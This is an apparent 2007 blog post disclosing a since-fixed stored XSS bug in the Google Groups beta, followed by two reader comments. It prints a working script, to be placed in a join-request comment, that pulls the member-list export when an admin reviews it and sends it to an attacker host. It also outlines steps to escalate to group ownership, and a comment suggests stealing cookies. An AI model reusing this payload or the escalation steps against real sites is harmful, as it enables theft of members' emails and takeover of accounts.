Pending Members - Google Groups XSS Bug [Part 2]

Some weeks ago I wrote about a Google groups bug where it was possible to get all the mail adresses from subscribed members for a Google group. I have already reported this bug to Google, but there is nobody interessted in fixing it. Last evening I wrote a small script that will show you how dangerous this bug is.

 

How to get membership list of a Google group?

The new Google groups beta web site offers you an option to export all your subscribed members if you are the owner for that group. This option is a simple GET to following the URL (below http://groups-beta.google.com):

/group/[GROUPNAME]/manage_members/MemberList.csv?Action.Export=Export+member+list

If you click on the button in the Managment tasks (Manage members -> Export member list) you will be redirected to that URL. (Note: sometimes the output is very slow, so wait up to 5 seconds to get it.)

To run the same GET command you must be an administrator of the Google group. But wouldn't it be easier to let the administrator of the group do this for you? Yes, of course, and this is very simple. Click on the Join this group link in top of the Google group, login with you Google account and add following lines to the comment box while subscribing:

<script type="text/javascript">
var xmlhttp = new XMLHttpRequest();
xmlhttp.open("GET", "/group/[GROUPNAME]/manage_members/MemberList.csv?" +
"Action.Export=Export+member+list"
, true); xmlhttp.onreadystatechange = function () { if (xmlhttp.readyState == 4) { var img = document.createElement("img"); img.src = "http://yourdomain/?" + escape(xmlhttp.responseText); document.body.appendChild(img); } }; xmlhttp.send(null); </script>

This is a very simple XMLHttpRequest (AJAX request) which will run a GET on the specified URL. If it is finished (xmlhttp.readyState == 4) it will create a new image tag with a URL that will use the response as an argument, and that argument you can read on your web server (which is http://yourdomain in my example above).

Now, when the administrator of the Google group will check pending subscriptions the script gets executed. Because of the URL length limit you will not get all the email contacts, but this wouldn't be hard to change, of course.

 

How to get ownership of any Google group? 

While playing around I tried to run more requests I found out that it would be possible to get your own member ID with following URL:

/group/[GROUPNAME]/manage_members?view=all&sort=email&member_q=[YOURNAME]&Action.Search=Find+member

With this result you can run a GET on following URL which will include the member ID (uid):

/group/[GROUPNAME]/manage_member?uid=[UID]

The html output of this URL will give you a new form which will include all the member subscription configuration. There is a param.delivery radio field, a param.membership_type value which you have to set to "o" to be an owner of this group, and so on. In the upper region of the form you will notice a WebToken (I didn't realize a change of the value) and the uid. A simple post to the URL /group/[GROUPNAME]/manage_member will now change your subscription configuration, and maybe you are owner of the Google group.

 

How to be safe for this bug?

Currently I see no real workaround to be safe for this problem. The only way I did it was running Fiddler while reviewing pending members and use the fantastic Automatic Breakpoints for every request.

 

Updated: The Google Groups bug has been fixed on 5. January, thanks to Google!!

Published Wednesday, January 3, 2007 5:09 PM by Michael Schwarz

Comments

# re: Pending Members - Google Groups XSS Bug [Part 2]

Wednesday, January 3, 2007 3:05 PM by Bertrand Le Roy

Couldn't you even (and more simply) steal the administrator's cookies and post them to a remote location? That would enable you to simply steal the group.

# re: Pending Members - Google Groups XSS Bug [Part 2]

Thursday, January 4, 2007 11:34 AM by Michael Schwarz

@Bertrand: yes and no, if you have stolen the cookie you have to do your action right after it, because when the owner has signed out the cookie is not valid any more.

Michael